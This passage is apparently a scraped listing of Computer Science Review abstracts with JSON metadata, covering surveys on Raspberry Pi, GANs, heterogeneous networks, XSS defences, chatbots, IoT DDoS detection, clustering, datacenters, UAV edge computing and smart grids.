Raspberry Pi is an invaluable and popular prototyping tool in scientific research for experimenting with a wide variety of ideas, ranging from simple to complex projects. This review article explores how Raspberry Pi is used in various studies, discussing its pros and cons along with its applications in various domains such as home automation, agriculture, healthcare, industrial control, and advanced research. Our aim is to provide a useful resource for researchers, educators, students, product developers, and enthusiasts, helping them to grasp the current status and discover new research possibilities using Raspberry Pi.
在科学研究中,Raspberry Pi 是一种宝贵而流行的原型工具,可用于实验从简单到复杂的各种项目。这篇综述文章探讨了 Raspberry Pi 在各种研究中的应用,讨论了它的优缺点以及在家庭自动化、农业、医疗保健、工业控制和高级研究等各个领域的应用。我们的目的是为研究人员、教育工作者、学生、产品开发人员和爱好者提供有用的资源,帮助他们掌握 Raspberry Pi 的现状并发现新的研究可能性。
{"title":"A comprehensive review on applications of Raspberry Pi","authors":"Sudha Ellison Mathe , Hari Kishan Kondaveeti , Suseela Vappangi , Sunny Dayal Vanambathina , Nandeesh Kumar Kumaravelu","doi":"10.1016/j.cosrev.2024.100636","DOIUrl":"https://doi.org/10.1016/j.cosrev.2024.100636","url":null,"abstract":"<div><p>Raspberry Pi is an invaluable and popular prototyping tool in scientific research for experimenting with a wide variety of ideas, ranging from simple to complex projects. This review article explores how Raspberry Pi is used in various studies, discussing its pros and cons along with its applications in various domains such as home automation, agriculture, healthcare, industrial control, and advanced research. Our aim is to provide a useful resource for researchers, educators, students, product developers, and enthusiasts, helping them to grasp the current status and discover new research possibilities using Raspberry Pi.</p></div>","PeriodicalId":48633,"journal":{"name":"Computer Science Review","volume":null,"pages":null},"PeriodicalIF":12.9,"publicationDate":"2024-05-01","publicationTypes":"Journal Article","fieldsOfStudy":null,"isOpenAccess":false,"openAccessPdf":"","citationCount":null,"resultStr":null,"platform":"Semanticscholar","paperid":"140917835","PeriodicalName":null,"FirstCategoryId":null,"ListUrlMain":null,"RegionNum":1,"RegionCategory":"计算机科学","ArticlePicture":[],"TitleCN":null,"AbstractTextCN":null,"PMCID":"","EPubDate":null,"PubModel":null,"JCR":null,"JCRName":null,"Score":null,"Total":0}
Pub Date : 2024-04-27DOI: 10.1016/j.cosrev.2024.100635
Yali Lv , Jingpu Duan , Xiong Li
This paper provides an extensive and in-depth survey of behavior modeling for complex intelligent systems, focusing specifically on the innovative applications of Generative Adversarial Networks (GANs). The survey not only delves into the fundamental principles of GANs, but also elucidates their pivotal role in accurately modeling the behaviors exhibited by complex intelligent systems. By categorizing behavior modeling into prediction and learning, this survey meticulously examines the current landscape of research in each domain, shedding light on the latest advancements and methodologies driven by GANs. Furthermore, the paper offers insights into both the theoretical underpinnings and practical implications of GANs in behavior modeling for complex intelligent systems, and proposes potential future research directions to advance the field. Overall, this comprehensive survey serves as a valuable resource for researchers, practitioners, and scholars seeking to deepen their understanding of behavior modeling using GANs and to chart a course for future exploration and innovation in this dynamic field.
{"title":"A survey on modeling for behaviors of complex intelligent systems based on generative adversarial networks","authors":"Yali Lv , Jingpu Duan , Xiong Li","doi":"10.1016/j.cosrev.2024.100635","DOIUrl":"https://doi.org/10.1016/j.cosrev.2024.100635","url":null,"abstract":"<div><p>This paper provides an extensive and in-depth survey of behavior modeling for complex intelligent systems, focusing specifically on the innovative applications of Generative Adversarial Networks (GANs). The survey not only delves into the fundamental principles of GANs, but also elucidates their pivotal role in accurately modeling the behaviors exhibited by complex intelligent systems. By categorizing behavior modeling into prediction and learning, this survey meticulously examines the current landscape of research in each domain, shedding light on the latest advancements and methodologies driven by GANs. Furthermore, the paper offers insights into both the theoretical underpinnings and practical implications of GANs in behavior modeling for complex intelligent systems, and proposes potential future research directions to advance the field. Overall, this comprehensive survey serves as a valuable resource for researchers, practitioners, and scholars seeking to deepen their understanding of behavior modeling using GANs and to chart a course for future exploration and innovation in this dynamic field.</p></div>","PeriodicalId":48633,"journal":{"name":"Computer Science Review","volume":null,"pages":null},"PeriodicalIF":12.9,"publicationDate":"2024-04-27","publicationTypes":"Journal Article","fieldsOfStudy":null,"isOpenAccess":false,"openAccessPdf":"","citationCount":null,"resultStr":null,"platform":"Semanticscholar","paperid":"140650636","PeriodicalName":null,"FirstCategoryId":null,"ListUrlMain":null,"RegionNum":1,"RegionCategory":"计算机科学","ArticlePicture":[],"TitleCN":null,"AbstractTextCN":null,"PMCID":"","EPubDate":null,"PubModel":null,"JCR":null,"JCRName":null,"Score":null,"Total":0}
The integration of multiple heterogeneous data into graph models has been the subject of extensive research in recent years. Harnessing these resulting Heterogeneous Information Networks (HINs) is a complex task that requires reasoning to perform various prediction tasks.
In the last decade, multiple Artificial Intelligence (AI) approaches have been developed to bridge the gap between the abundance of diverse data within various fields, their heterogeneity and complexity within HINs. A focus has been directed on developing graph-oriented algorithms that can effectively analyze and leverage the rich information in HINs.
Given the sheer volume of approaches being developed, selecting the most suitable one for a specific objective has become a daunting challenge. This article reviews the recent advances in AI methods for modeling and analyzing HINs. It proposes a cartography of these approaches, structured as a pipeline, offering diverse options at each stage. This structured framework aims to guide practitioners in choosing the most fitting methods based on the nature of their data and specific objectives.
近年来,将多种异构数据整合到图模型中一直是广泛研究的主题。在过去的十年中,人们开发了多种人工智能(AI)方法,以弥补各领域丰富多样的数据与 HIN 中的异构性和复杂性之间的差距。鉴于开发的方法数量庞大,为特定目标选择最合适的方法已成为一项艰巨的挑战。本文回顾了用于 HINs 建模和分析的人工智能方法的最新进展。文章提出了这些方法的结构图,作为一个流水线,在每个阶段提供不同的选择。这一结构化框架旨在指导从业人员根据数据性质和具体目标选择最合适的方法。
{"title":"Harnessing Heterogeneous Information Networks: A systematic literature review","authors":"Leila Outemzabet , Nicolas Gaud , Aurélie Bertaux , Christophe Nicolle , Stéphane Gerart , Sébastien Vachenc","doi":"10.1016/j.cosrev.2024.100633","DOIUrl":"https://doi.org/10.1016/j.cosrev.2024.100633","url":null,"abstract":"<div><p>The integration of multiple heterogeneous data into graph models has been the subject of extensive research in recent years. Harnessing these resulting Heterogeneous Information Networks (HINs) is a complex task that requires reasoning to perform various prediction tasks.</p><p>In the last decade, multiple Artificial Intelligence (AI) approaches have been developed to bridge the gap between the abundance of diverse data within various fields, their heterogeneity and complexity within HINs. A focus has been directed on developing graph-oriented algorithms that can effectively analyze and leverage the rich information in HINs.</p><p>Given the sheer volume of approaches being developed, selecting the most suitable one for a specific objective has become a daunting challenge. This article reviews the recent advances in AI methods for modeling and analyzing HINs. It proposes a cartography of these approaches, structured as a pipeline, offering diverse options at each stage. This structured framework aims to guide practitioners in choosing the most fitting methods based on the nature of their data and specific objectives.</p></div>","PeriodicalId":48633,"journal":{"name":"Computer Science Review","volume":null,"pages":null},"PeriodicalIF":12.9,"publicationDate":"2024-04-27","publicationTypes":"Journal Article","fieldsOfStudy":null,"isOpenAccess":false,"openAccessPdf":"","citationCount":null,"resultStr":null,"platform":"Semanticscholar","paperid":"140807234","PeriodicalName":null,"FirstCategoryId":null,"ListUrlMain":null,"RegionNum":1,"RegionCategory":"计算机科学","ArticlePicture":[],"TitleCN":null,"AbstractTextCN":null,"PMCID":"","EPubDate":null,"PubModel":null,"JCR":null,"JCRName":null,"Score":null,"Total":0}
Cross-site scripting (XSS) is one of the major threats menacing the privacy of data and the navigation of trusted web applications. Since its disclosure in late 1999 by Microsoft security engineers, several techniques have been developed with the aim of securing web navigation and protecting web applications against XSS attacks. XSS has been and is still in the top 10 list of web vulnerabilities reported by the Open Web Applications Security Project (OWASP). Consequently, handling XSS attacks has become one of the major concerns of several web security communities. Despite the numerous studies that have been conducted to combat XSS attacks, the attacks continue to rise. This motivates the study of how the interest in XSS attacks has evolved over the years, what has already been achieved to prevent these attacks, and what is missing to restrain their prevalence. In this paper, we conduct a systematic mapping and a comprehensive survey with the aim of answering all these questions. We summarize and categorize existing endeavors that aim to handle XSS attacks and develop XSS-free web applications. The systematic mapping yielded 157 high-quality published studies. By thoroughly analyzing those studies, a comprehensive taxonomy is drawn out outlining various techniques used to prevent, detect, protect, and defend against XSS attacks and vulnerabilities. The study of the literature revealed a remarkable interest bias toward basic (84.71%) and JavaScript (81.63%) XSS attacks as well as a dearth of vulnerability repair mechanisms and tools (only 1.48%). Notably, existing vulnerability detection techniques focus solely on single-page detection, overlooking flaws that may span across multiple pages. Furthermore, the study brought to the forefront the limitations and challenges of existing attack detection and defense techniques concerning machine learning and content-security policies. Consequently, we strongly advocate the development of more suitable detection and defense techniques, along with an increased focus on addressing XSS vulnerabilities through effective detection (hybrid solutions) and repair strategies. Additionally, there is a pressing need for more high-quality studies to overcome the limitations of promising approaches such as machine learning and content-security policies while also addressing diverse XSS attacks in different languages. Hopefully, this study can serve as guidance for both the academic and practitioner communities in the development of XSS-free web applications.
{"title":"Twenty-two years since revealing cross-site scripting attacks: A systematic mapping and a comprehensive survey","authors":"Abdelhakim Hannousse , Salima Yahiouche , Mohamed Cherif Nait-Hamoud","doi":"10.1016/j.cosrev.2024.100634","DOIUrl":"https://doi.org/10.1016/j.cosrev.2024.100634","url":null,"abstract":"<div><p>Cross-site scripting (XSS) is one of the major threats menacing the privacy of data and the navigation of trusted web applications. Since its disclosure in late 1999 by Microsoft security engineers, several techniques have been developed with the aim of securing web navigation and protecting web applications against XSS attacks. XSS has been and is still in the top 10 list of web vulnerabilities reported by the Open Web Applications Security Project (OWASP). Consequently, handling XSS attacks has become one of the major concerns of several web security communities. Despite the numerous studies that have been conducted to combat XSS attacks, the attacks continue to rise. This motivates the study of how the interest in XSS attacks has evolved over the years, what has already been achieved to prevent these attacks, and what is missing to restrain their prevalence. In this paper, we conduct a systematic mapping and a comprehensive survey with the aim of answering all these questions. We summarize and categorize existing endeavors that aim to handle XSS attacks and develop XSS-free web applications. The systematic mapping yielded 157 high-quality published studies. By thoroughly analyzing those studies, a comprehensive taxonomy is drawn out outlining various techniques used to prevent, detect, protect, and defend against XSS attacks and vulnerabilities. The study of the literature revealed a remarkable interest bias toward basic (84.71%) and JavaScript (81.63%) XSS attacks as well as a dearth of vulnerability repair mechanisms and tools (only 1.48%). Notably, existing vulnerability detection techniques focus solely on single-page detection, overlooking flaws that may span across multiple pages. Furthermore, the study brought to the forefront the limitations and challenges of existing attack detection and defense techniques concerning machine learning and content-security policies. Consequently, we strongly advocate the development of more suitable detection and defense techniques, along with an increased focus on addressing XSS vulnerabilities through effective detection (hybrid solutions) and repair strategies. Additionally, there is a pressing need for more high-quality studies to overcome the limitations of promising approaches such as machine learning and content-security policies while also addressing diverse XSS attacks in different languages. Hopefully, this study can serve as guidance for both the academic and practitioner communities in the development of XSS-free web applications.</p></div>","PeriodicalId":48633,"journal":{"name":"Computer Science Review","volume":null,"pages":null},"PeriodicalIF":12.9,"publicationDate":"2024-04-23","publicationTypes":"Journal Article","fieldsOfStudy":null,"isOpenAccess":false,"openAccessPdf":"","citationCount":null,"resultStr":null,"platform":"Semanticscholar","paperid":"140638499","PeriodicalName":null,"FirstCategoryId":null,"ListUrlMain":null,"RegionNum":1,"RegionCategory":"计算机科学","ArticlePicture":[],"TitleCN":null,"AbstractTextCN":null,"PMCID":"","EPubDate":null,"PubModel":null,"JCR":null,"JCRName":null,"Score":null,"Total":0}
This review paper offers an in-depth analysis of AI-powered virtual conversational agents, specifically focusing on OpenAI’s ChatGPT. The main contributions of this paper are threefold: (i) an exhaustive review of prior literature on chatbots, (ii) a background of chatbots including existing chatbots/conversational agents like ChatGPT, and (iii) a UI/UX design analysis of prominent chatbots. Another contribution of this review is the comprehensive exploration of ChatGPT’s applications across a multitude of sectors, including education, business, public health, and more. This review highlights the transformative potential of ChatGPT, despite the challenges it faces such as hallucination, biases in training data, jailbreaks, and anonymous data collection. The review paper then presents a comprehensive survey of prior literature reviews on chatbots, identifying gaps in the prior work and highlighting the need for further research in areas such as chatbot evaluation, user experience, and ethical considerations. The paper also provides a detailed analysis of the UI/UX design of prominent chatbots, including their conversational flow, visual design, and user engagement. The paper also identifies key future research directions, including mitigating language bias, enhancing ethical decision-making capabilities, improving user interaction and personalization, and developing robust governance frameworks. By solving these issues, we can ensure that AI chatbots like ChatGPT are used responsibly and effectively across a broad variety of applications. This review will be a valuable resource for researchers and practitioners in understanding the current state and future potential of AI chatbots like ChatGPT.
{"title":"A contemporary review on chatbots, AI-powered virtual conversational agents, ChatGPT: Applications, open challenges and future research directions","authors":"Avyay Casheekar, Archit Lahiri, Kanishk Rath, Kaushik Sanjay Prabhakar, Kathiravan Srinivasan","doi":"10.1016/j.cosrev.2024.100632","DOIUrl":"https://doi.org/10.1016/j.cosrev.2024.100632","url":null,"abstract":"<div><p>This review paper offers an in-depth analysis of AI-powered virtual conversational agents, specifically focusing on OpenAI’s ChatGPT. The main contributions of this paper are threefold: (i) an exhaustive review of prior literature on chatbots, (ii) a background of chatbots including existing chatbots/conversational agents like ChatGPT, and (iii) a UI/UX design analysis of prominent chatbots. Another contribution of this review is the comprehensive exploration of ChatGPT’s applications across a multitude of sectors, including education, business, public health, and more. This review highlights the transformative potential of ChatGPT, despite the challenges it faces such as hallucination, biases in training data, jailbreaks, and anonymous data collection. The review paper then presents a comprehensive survey of prior literature reviews on chatbots, identifying gaps in the prior work and highlighting the need for further research in areas such as chatbot evaluation, user experience, and ethical considerations. The paper also provides a detailed analysis of the UI/UX design of prominent chatbots, including their conversational flow, visual design, and user engagement. The paper also identifies key future research directions, including mitigating language bias, enhancing ethical decision-making capabilities, improving user interaction and personalization, and developing robust governance frameworks. By solving these issues, we can ensure that AI chatbots like ChatGPT are used responsibly and effectively across a broad variety of applications. This review will be a valuable resource for researchers and practitioners in understanding the current state and future potential of AI chatbots like ChatGPT.</p></div>","PeriodicalId":48633,"journal":{"name":"Computer Science Review","volume":null,"pages":null},"PeriodicalIF":12.9,"publicationDate":"2024-04-09","publicationTypes":"Journal Article","fieldsOfStudy":null,"isOpenAccess":false,"openAccessPdf":"","citationCount":null,"resultStr":null,"platform":"Semanticscholar","paperid":"140540470","PeriodicalName":null,"FirstCategoryId":null,"ListUrlMain":null,"RegionNum":1,"RegionCategory":"计算机科学","ArticlePicture":[],"TitleCN":null,"AbstractTextCN":null,"PMCID":"","EPubDate":null,"PubModel":null,"JCR":null,"JCRName":null,"Score":null,"Total":0}
Pub Date : 2024-03-30DOI: 10.1016/j.cosrev.2024.100631
Bindu Bala , Sunny Behal
Distributed Denial of Service (DDoS) attacks in IoT networks are one of the most devastating and challenging cyber-attacks. The number of IoT users is growing exponentially due to the increase in IoT devices over the past years. Consequently, DDoS attack has become the most prominent attack as vulnerable IoT devices are becoming victims of it. In the literature, numerous techniques have been proposed to detect IoT-based DDoS attacks. However, techniques based on Artificial Intelligence (AI) have proven to be effective in the detection of cyber-attacks in comparison to other alternative techniques. This paper presents a systematic literature review of AI-based tools and techniques used for analysis, classification, and detection of the most threatening, prominent, and dreadful IoT-based DDoS attacks between the years 2019 to 2023. A comparative study of real datasets having IoT traffic features has also been illustrated. The findings of this systematic review provide useful insights into the existing research landscape for designing AI-based models to detect IoT-based DDoS attacks specifically. Additionally, the study sheds light on IoT botnet lifecycle, various botnet families, the taxonomy of IoT-based DDoS attacks, prominent tools used to launch DDoS attack, publicly available IoT datasets, the taxonomy of AI techniques, popular software available for ML/DL modeling, a list of numerous research challenges and future directions that may aid in the development of novel and reliable methods for identifying and categorizing IoT-based DDoS attacks.
{"title":"AI techniques for IoT-based DDoS attack detection: Taxonomies, comprehensive review and research challenges","authors":"Bindu Bala , Sunny Behal","doi":"10.1016/j.cosrev.2024.100631","DOIUrl":"https://doi.org/10.1016/j.cosrev.2024.100631","url":null,"abstract":"<div><p>Distributed Denial of Service (DDoS) attacks in IoT networks are one of the most devastating and challenging cyber-attacks. The number of IoT users is growing exponentially due to the increase in IoT devices over the past years. Consequently, DDoS attack has become the most prominent attack as vulnerable IoT devices are becoming victims of it. In the literature, numerous techniques have been proposed to detect IoT-based DDoS attacks. However, techniques based on Artificial Intelligence (AI) have proven to be effective in the detection of cyber-attacks in comparison to other alternative techniques. This paper presents a systematic literature review of AI-based tools and techniques used for analysis, classification, and detection of the most threatening, prominent, and dreadful IoT-based DDoS attacks between the years 2019 to 2023. A comparative study of real datasets having IoT traffic features has also been illustrated. The findings of this systematic review provide useful insights into the existing research landscape for designing AI-based models to detect IoT-based DDoS attacks specifically. Additionally, the study sheds light on IoT botnet lifecycle, various botnet families, the taxonomy of IoT-based DDoS attacks, prominent tools used to launch DDoS attack, publicly available IoT datasets, the taxonomy of AI techniques, popular software available for ML/DL modeling, a list of numerous research challenges and future directions that may aid in the development of novel and reliable methods for identifying and categorizing IoT-based DDoS attacks.</p></div>","PeriodicalId":48633,"journal":{"name":"Computer Science Review","volume":null,"pages":null},"PeriodicalIF":12.9,"publicationDate":"2024-03-30","publicationTypes":"Journal Article","fieldsOfStudy":null,"isOpenAccess":false,"openAccessPdf":"","citationCount":null,"resultStr":null,"platform":"Semanticscholar","paperid":"140330585","PeriodicalName":null,"FirstCategoryId":null,"ListUrlMain":null,"RegionNum":1,"RegionCategory":"计算机科学","ArticlePicture":[],"TitleCN":null,"AbstractTextCN":null,"PMCID":"","EPubDate":null,"PubModel":null,"JCR":null,"JCRName":null,"Score":null,"Total":0}
Pub Date : 2024-02-26DOI: 10.1016/j.cosrev.2024.100621
Guoxian Yu , Liangrui Ren , Jun Wang , Carlotta Domeniconi , Xiangliang Zhang
Clustering is a fundamental data exploration technique to discover hidden grouping structure of data. With the proliferation of big data, and the increase of volume and variety, the complexity of data multiplicity is increasing as well. Traditional clustering methods can provide only a single clustering result, which restricts data exploration to one single possible partition. In contrast, multiple clustering can simultaneously or sequentially uncover multiple non-redundant and distinct clustering solutions, which can reveal multiple interesting hidden structures of the data from different perspectives. For these reasons, multiple clustering has become a popular and promising field of study. In this survey, we have conducted a systematic review of the existing multiple clustering methods. Specifically, we categorize existing approaches according to four different perspectives (i.e., multiple clustering in the original space, in subspaces and on multi-view data, and multiple co-clustering). We summarize the key ideas underlying the techniques and their objective functions, and discuss the advantages and disadvantages of each. In addition, we built a repository of multiple clustering resources (i.e., benchmark datasets and codes). Finally, we discuss the key open issues for future investigation.
{"title":"Multiple clusterings: Recent advances and perspectives","authors":"Guoxian Yu , Liangrui Ren , Jun Wang , Carlotta Domeniconi , Xiangliang Zhang","doi":"10.1016/j.cosrev.2024.100621","DOIUrl":"https://doi.org/10.1016/j.cosrev.2024.100621","url":null,"abstract":"<div><p>Clustering is a fundamental data exploration technique to discover hidden grouping structure of data. With the proliferation of big data, and the increase of volume and variety, the complexity of data multiplicity is increasing as well. Traditional clustering methods can provide only a single clustering result, which restricts data exploration to one single possible partition. In contrast, multiple clustering can simultaneously or sequentially uncover multiple non-redundant and distinct clustering solutions, which can reveal multiple interesting hidden structures of the data from different perspectives. For these reasons, multiple clustering has become a popular and promising field of study. In this survey, we have conducted a systematic review of the existing multiple clustering methods. Specifically, we categorize existing approaches according to four different perspectives (i.e., multiple clustering in the original space, in subspaces and on multi-view data, and multiple co-clustering). We summarize the key ideas underlying the techniques and their objective functions, and discuss the advantages and disadvantages of each. In addition, we built a repository of multiple clustering resources (i.e., benchmark datasets and codes). Finally, we discuss the key open issues for future investigation.</p></div>","PeriodicalId":48633,"journal":{"name":"Computer Science Review","volume":null,"pages":null},"PeriodicalIF":12.9,"publicationDate":"2024-02-26","publicationTypes":"Journal Article","fieldsOfStudy":null,"isOpenAccess":false,"openAccessPdf":"","citationCount":null,"resultStr":null,"platform":"Semanticscholar","paperid":"139975673","PeriodicalName":null,"FirstCategoryId":null,"ListUrlMain":null,"RegionNum":1,"RegionCategory":"计算机科学","ArticlePicture":[],"TitleCN":null,"AbstractTextCN":null,"PMCID":"","EPubDate":null,"PubModel":null,"JCR":null,"JCRName":null,"Score":null,"Total":0}
Pub Date : 2024-02-13DOI: 10.1016/j.cosrev.2024.100620
Muhammad Zakarya , Ayaz Ali Khan , Mohammed Reza Chalak Qazani , Hashim Ali , Mahmood Al-Bahri , Atta Ur Rehman Khan , Ahmad Ali , Rahim Khan
The growth rate in big data and internet of things (IoT) is far exceeding the computer performance rate at which modern processors can compute on the massive amount of data. The cluster and cloud technologies enriched by machine learning applications had significantly helped in performance growths subject to the underlying network performance. Computer systems have been studied for improvement in performance, driven by user’s applications demand, in the past few decades, particularly from 1990 to 2010. By the mid of 2010 to 2023, albeit parallel and distributed computing was omnipresent, but the total performance improvement rate of a single computing core had significantly reduced. Similarly, from 2010 to 2023, our digital world of big data and IoT has considerably increased from 1.2 Zettabytes (i.e., sextillion bytes) to approximately 120 zettabytes. Moreover, in 2022 cloud datacenters consumed 200TWh of energy worldwide. However, due to their ever-increasing energy demand which causes emissions, over the past years the focus has shifted to the design of architectures, software, and in particular, intelligent algorithms to compute on the data more efficiently and intelligently. The energy consumption problem is even greater for large-scale systems that involve several thousand servers. Combining these fears, cloud service providers are presently facing more challenges than earlier because they fight to keep up with the extraordinary network traffic being produced by the world’s fast-tracked move to online due to global pandemics. In this paper, we deliberate the energy consumption and performance problems of large-scale systems and present several taxonomies of energy and performance aware methodologies. We debate over the energy and performance efficiencies, both, which make this study different from those previously published in the literature. Important research papers have been surveyed to characterise and recognise crucial and outstanding topics for further research. We deliberate numerous state-of-the-art methods and algorithms, stated in the literature, that claim to advance the energy efficiency and performance of large-scale computing systems, and recognise numerous open challenges.
{"title":"Sustainable computing across datacenters: A review of enabling models and techniques","authors":"Muhammad Zakarya , Ayaz Ali Khan , Mohammed Reza Chalak Qazani , Hashim Ali , Mahmood Al-Bahri , Atta Ur Rehman Khan , Ahmad Ali , Rahim Khan","doi":"10.1016/j.cosrev.2024.100620","DOIUrl":"https://doi.org/10.1016/j.cosrev.2024.100620","url":null,"abstract":"<div><p>The growth rate in big data and internet of things (IoT) is far exceeding the computer performance rate at which modern processors can compute on the massive amount of data. The cluster and cloud technologies enriched by machine learning applications had significantly helped in performance growths subject to the underlying network performance. Computer systems have been studied for improvement in performance, driven by user’s applications demand, in the past few decades, particularly from 1990 to 2010. By the mid of 2010 to 2023, albeit parallel and distributed computing was omnipresent, but the total performance improvement rate of a single computing core had significantly reduced. Similarly, from 2010 to 2023, our digital world of big data and IoT has considerably increased from 1.2 Zettabytes (i.e., sextillion bytes) to approximately 120 zettabytes. Moreover, in 2022 cloud datacenters consumed <span><math><mo>∼</mo></math></span> 200TWh of energy worldwide. However, due to their ever-increasing energy demand which causes <span><math><msub><mrow><mi>CO</mi></mrow><mrow><mn>2</mn></mrow></msub></math></span> emissions, over the past years the focus has shifted to the design of architectures, software, and in particular, intelligent algorithms to compute on the data more efficiently and intelligently. The energy consumption problem is even greater for large-scale systems that involve several thousand servers. Combining these fears, cloud service providers are presently facing more challenges than earlier because they fight to keep up with the extraordinary network traffic being produced by the world’s fast-tracked move to online due to global pandemics. In this paper, we deliberate the energy consumption and performance problems of large-scale systems and present several taxonomies of energy and performance aware methodologies. We debate over the energy and performance efficiencies, both, which make this study different from those previously published in the literature. Important research papers have been surveyed to characterise and recognise crucial and outstanding topics for further research. We deliberate numerous state-of-the-art methods and algorithms, stated in the literature, that claim to advance the energy efficiency and performance of large-scale computing systems, and recognise numerous open challenges.</p></div>","PeriodicalId":48633,"journal":{"name":"Computer Science Review","volume":null,"pages":null},"PeriodicalIF":12.9,"publicationDate":"2024-02-13","publicationTypes":"Journal Article","fieldsOfStudy":null,"isOpenAccess":false,"openAccessPdf":"","citationCount":null,"resultStr":null,"platform":"Semanticscholar","paperid":"139726310","PeriodicalName":null,"FirstCategoryId":null,"ListUrlMain":null,"RegionNum":1,"RegionCategory":"计算机科学","ArticlePicture":[],"TitleCN":null,"AbstractTextCN":null,"PMCID":"","EPubDate":null,"PubModel":null,"JCR":null,"JCRName":null,"Score":null,"Total":0}
Pub Date : 2024-02-01DOI: 10.1016/j.cosrev.2023.100615
Mohd Hirzi Adnan , Zuriati Ahmad Zukarnain , Oluwatosin Ahmed Amodu
The huge prospects of the internet of things (IoT) have led to an ever-growing demand for computing power by IoT users to enable various applications. Multi-access edge computing (MEC) research and development has rapidly gained attention during the last decade. The ability to deploy edge servers at different points across a content delivery network that can offer communication and computing services close to mobile user devices is one of the main factors driving the evolution of MEC. Furthermore, MEC has been considered a potentially transformational approach for fifth-generation (5 G) and beyond 5 G (B5G) networks, as well as a potential improvement to conventional cloud computing. Unmanned aerial vehicles (UAVs) can be used as effective aerial platforms to offer reliable and ubiquitous connections in wireless communication networks due to their distinctive qualities, such as high cruising altitude, on-demand deployment, and three-dimensional (3D) maneuverability. The number of research studies published in this area has dramatically increased due to the growing interest in UAV-enabled MEC. Although UAV-enabled MEC systems have been well studied, the existing models are becoming increasingly heterogeneous and scattered without harmony. This paper provides a comprehensive analysis of the literature on UAV-enabled MEC systems with a special focus on the system modeling, and optimization techniques for five identified domains, such as energy efficiency, resource allocation, trajectory control, latency, and security. For each domain, we have highlighted the recent advances, critical findings, and the advantages and disadvantages. Additionally, the identified proposed techniques were analyzed and discussed, with emphasize on the constraints and performance metrics. We also discuss a general system model for each highlighted domain. Moreover, the lessons are also derived from the study on system optimization and system modeling techniques identified in this paper. Then we discuss open issues related to UAV-enabled MEC systems in each highlighted domain, including problem formulation and optimization techniques. Finally, this paper lay out directions for future research to solve the aforementioned problems associated with UAV-enabled MEC systems.
{"title":"Fundamental design aspects of UAV-enabled MEC systems: A review on models, challenges, and future opportunities","authors":"Mohd Hirzi Adnan , Zuriati Ahmad Zukarnain , Oluwatosin Ahmed Amodu","doi":"10.1016/j.cosrev.2023.100615","DOIUrl":"https://doi.org/10.1016/j.cosrev.2023.100615","url":null,"abstract":"<div><p>The huge prospects of the internet of things (IoT) have led to an ever-growing demand for computing power by IoT users to enable various applications. Multi-access edge computing (MEC) research and development has rapidly gained attention during the last decade. The ability to deploy edge servers at different points across a content delivery network that can offer communication and computing services close to mobile user devices is one of the main factors driving the evolution of MEC. Furthermore, MEC has been considered a potentially transformational approach for fifth-generation (5 G) and beyond 5 G (B5G) networks, as well as a potential improvement to conventional cloud computing. Unmanned aerial vehicles (UAVs) can be used as effective aerial platforms to offer reliable and ubiquitous connections in wireless communication networks due to their distinctive qualities, such as high cruising altitude, on-demand deployment, and three-dimensional (3D) maneuverability. The number of research studies published in this area has dramatically increased due to the growing interest in UAV-enabled MEC. Although UAV-enabled MEC systems have been well studied, the existing models are becoming increasingly heterogeneous and scattered without harmony. This paper provides a comprehensive analysis of the literature on UAV-enabled MEC systems with a special focus on the system modeling, and optimization techniques for five identified domains, such as energy efficiency, resource allocation, trajectory control, latency, and security. For each domain, we have highlighted the recent advances, critical findings, and the advantages and disadvantages. Additionally, the identified proposed techniques were analyzed and discussed, with emphasize on the constraints and performance metrics. We also discuss a general system model for each highlighted domain. Moreover, the lessons are also derived from the study on system optimization and system modeling techniques identified in this paper. Then we discuss open issues related to UAV-enabled MEC systems in each highlighted domain, including problem formulation and optimization techniques. Finally, this paper lay out directions for future research to solve the aforementioned problems associated with UAV-enabled MEC systems.</p></div>","PeriodicalId":48633,"journal":{"name":"Computer Science Review","volume":null,"pages":null},"PeriodicalIF":12.9,"publicationDate":"2024-02-01","publicationTypes":"Journal Article","fieldsOfStudy":null,"isOpenAccess":false,"openAccessPdf":"https://www.sciencedirect.com/science/article/pii/S1574013723000825/pdfft?md5=82077d59b65835005a3894d0bb65ba35&pid=1-s2.0-S1574013723000825-main.pdf","citationCount":null,"resultStr":null,"platform":"Semanticscholar","paperid":"139699623","PeriodicalName":null,"FirstCategoryId":null,"ListUrlMain":null,"RegionNum":1,"RegionCategory":"计算机科学","ArticlePicture":[],"TitleCN":null,"AbstractTextCN":null,"PMCID":"OA","EPubDate":null,"PubModel":null,"JCR":null,"JCRName":null,"Score":null,"Total":0}
Electricity is one of the mandatory commodities for mankind today. To address challenges and issues in the transmission of electricity through the traditional grid, the concepts of smart grids and demand response have been developed. In such systems, a large amount of data is generated daily from various sources such as power generation (e.g., wind turbines), transmission and distribution (microgrids and fault detectors), load management (smart meters and smart electric appliances). Thanks to recent advancements in big data and computing technologies, Deep Learning (DL) can be leveraged to learn the patterns from the generated data and predict the demand for electricity and peak hours. Motivated by the advantages of deep learning in smart grids, this paper sets to provide a comprehensive survey on the application of DL for intelligent smart grids and demand response. Firstly, we present the fundamental of DL, smart grids, demand response, and the motivation behind the use of DL. Secondly, we review the state-of-the-art applications of DL in smart grids and demand response, including electric load forecasting, state estimation, energy theft detection, energy sharing and trading. Furthermore, we illustrate the practicality of DL via various use cases and projects. Finally, we highlight the challenges presented in existing research works and highlight important issues and potential directions in the use of DL for smart grids and demand response.
{"title":"Deep learning for intelligent demand response and smart grids: A comprehensive survey","authors":"Prabadevi Boopathy , Madhusanka Liyanage , Natarajan Deepa , Mounik Velavali , Shivani Reddy , Praveen Kumar Reddy Maddikunta , Neelu Khare , Thippa Reddy Gadekallu , Won-Joo Hwang , Quoc-Viet Pham","doi":"10.1016/j.cosrev.2024.100617","DOIUrl":"https://doi.org/10.1016/j.cosrev.2024.100617","url":null,"abstract":"<div><p>Electricity is one of the mandatory commodities for mankind today. To address challenges and issues in the transmission of electricity through the traditional grid, the concepts of smart grids and demand response have been developed. In such systems, a large amount of data is generated daily from various sources such as power generation (e.g., wind turbines), transmission and distribution (microgrids and fault detectors), load management (smart meters and smart electric appliances). Thanks to recent advancements in big data and computing technologies, Deep Learning (DL) can be leveraged to learn the patterns from the generated data and predict the demand for electricity and peak hours. Motivated by the advantages of deep learning in smart grids, this paper sets to provide a comprehensive survey on the application of DL for intelligent smart grids and demand response. Firstly, we present the fundamental of DL, smart grids, demand response, and the motivation behind the use of DL. Secondly, we review the state-of-the-art applications of DL in smart grids and demand response, including electric load forecasting, state estimation, energy theft detection, energy sharing and trading. Furthermore, we illustrate the practicality of DL via various use cases and projects. Finally, we highlight the challenges presented in existing research works and highlight important issues and potential directions in the use of DL for smart grids and demand 